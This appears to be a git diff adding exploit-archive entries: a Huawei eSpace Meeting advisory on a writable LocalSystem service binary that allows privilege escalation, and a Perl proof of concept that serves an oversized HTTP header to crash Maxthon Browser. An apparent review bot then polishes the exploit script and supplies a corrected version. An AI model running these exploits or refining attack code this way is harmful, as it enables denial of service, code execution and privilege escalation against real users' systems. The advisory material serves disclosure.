+Desc: The application is vulnerable to an elevation of privileges vulnerability
+which can be used by a simple user that can change the executable file with a
+binary of choice. The vulnerability exist due to the improper permissions, with
+the 'F' flag (full) for the 'Users' group, for the 'eMservice.exe' binary file.
+The service is installed by default to start on system boot with LocalSystem
+privileges. Attackers can replace the binary with their rootkit, and on reboot
+they get SYSTEM privileges. 
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerbility discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5171
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5171.php
+
+Huawei ID: Huawei-SA-20140310-01
+Huawei Advisory: http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-329170.htm
+
+
+
+18.01.2014
+
+------------------------------------
+
+C:\>sc qc eSpaceMeeting
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: eSpaceMeeting
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\ProgramData\eSpaceMeeting\eMservice.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : eSpaceMeeting
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>icacls ProgramData\eSpaceMeeting\eMservice.exe
+ProgramData\eSpaceMeeting\eMservice.exe BUILTIN\Users:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
+
+------------------------------------
diff --git a/platforms/windows/remote/32197.pl b/platforms/windows/remote/32197.pl
new file mode 100755
index 000000000..2b851cf49
--- /dev/null
+++ b/platforms/windows/remote/32197.pl
@@ -0,0 +1,50 @@
+source: http://www.securityfocus.com/bid/30617/info
+
+Maxthon Browser is prone to a buffer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Versions prior to Maxthon Browser 2.0 are vulnerable.
+
+#!/usr/bin/perl # Maxthon Browser << 2.0 Stack Overflow Crash # Descoverd by DATA_SNIPER # Usage: #connect from maxthon browser to http:/127.0.0.1/
+use IO::Socket;
+my $sock=new IO::Socket::INET (
+Listen => 1,
+
+LocalAddr => 'localhost',
+
+LocalPort => 80,
+
+Proto =>
+ 'tcp'); die unless $sock;
+$huge="A" x 1100000;
+$|=1; print "===================================================================\n";
+print " Mawthon Browser << 2.0 Stack Overflow Crash\n";
+print " Bug Descoverd by DATA_SNIPER\n";
+print " GreetZ To:Alpha_Hunter,Pirat Digital,Xodia,DelataAzize,AT4RE Team,all algerian hackers\n";
+print " Mail me at:Alpha_three3333(at)yahoo(dot)com\n"; print " BigGreetZ To: www.at4re.com,www.crownhacker.com\n";
+print"===================================================================\n"; print " [+] HTTP Server started on port 70... \n";
+print" [+]Try IExplore http://127.0.0.1/ \n";
+$z=$sock->accept(); print " [+]connection
+ Accepted!\n";
+do
+{
+ $ln=<$z>;
+
+print $ln;
+ chomp $ln;
+
+ if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
+ {
+
+print " [<>]Sending Evil Packet\n";
+
+print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
+
+close($z);
+
+exit;
+
+}
+} while (true);
+
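Review bot: The read loop never checks for end of file: when the client closes the connection before sending an empty line, `$ln=<$z>` returns undef, `chomp $ln` warns, and `$ln eq ""` is then true, so the 1.1 MB response is written to a socket the peer has already closed and the script exits as if it had succeeded. Because `last` cannot leave a `do {} while` block, the cleaner shape is a `while (defined(my $ln = <$z>))` loop as sketched below; the `$ln eq "\n"` test is dead after `chomp` and can go. The file also has no `use strict; use warnings;`, constructs the listener with the indirect-object form `new IO::Socket::INET (` instead of `IO::Socket::INET->new(`, reports nothing in `die unless $sock` (add `": $!"`), and closes with `while (true)`, where `true` is a bareword that only evaluates true because strictures are off. Finally, the banner announces "port 70" while `LocalPort => 80` is what is bound.
```perl
# … unchanged: socket setup, $huge, banner prints …
my $z = $sock->accept() or die "accept: $!";
print " [+]connection Accepted!\n";
while (defined(my $ln = <$z>)) {
    print $ln;
    chomp $ln;
    next unless $ln eq "" || $ln eq "\r";
    print " [<>]Sending Evil Packet\n";
    print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
    close($z);
    exit;
}
```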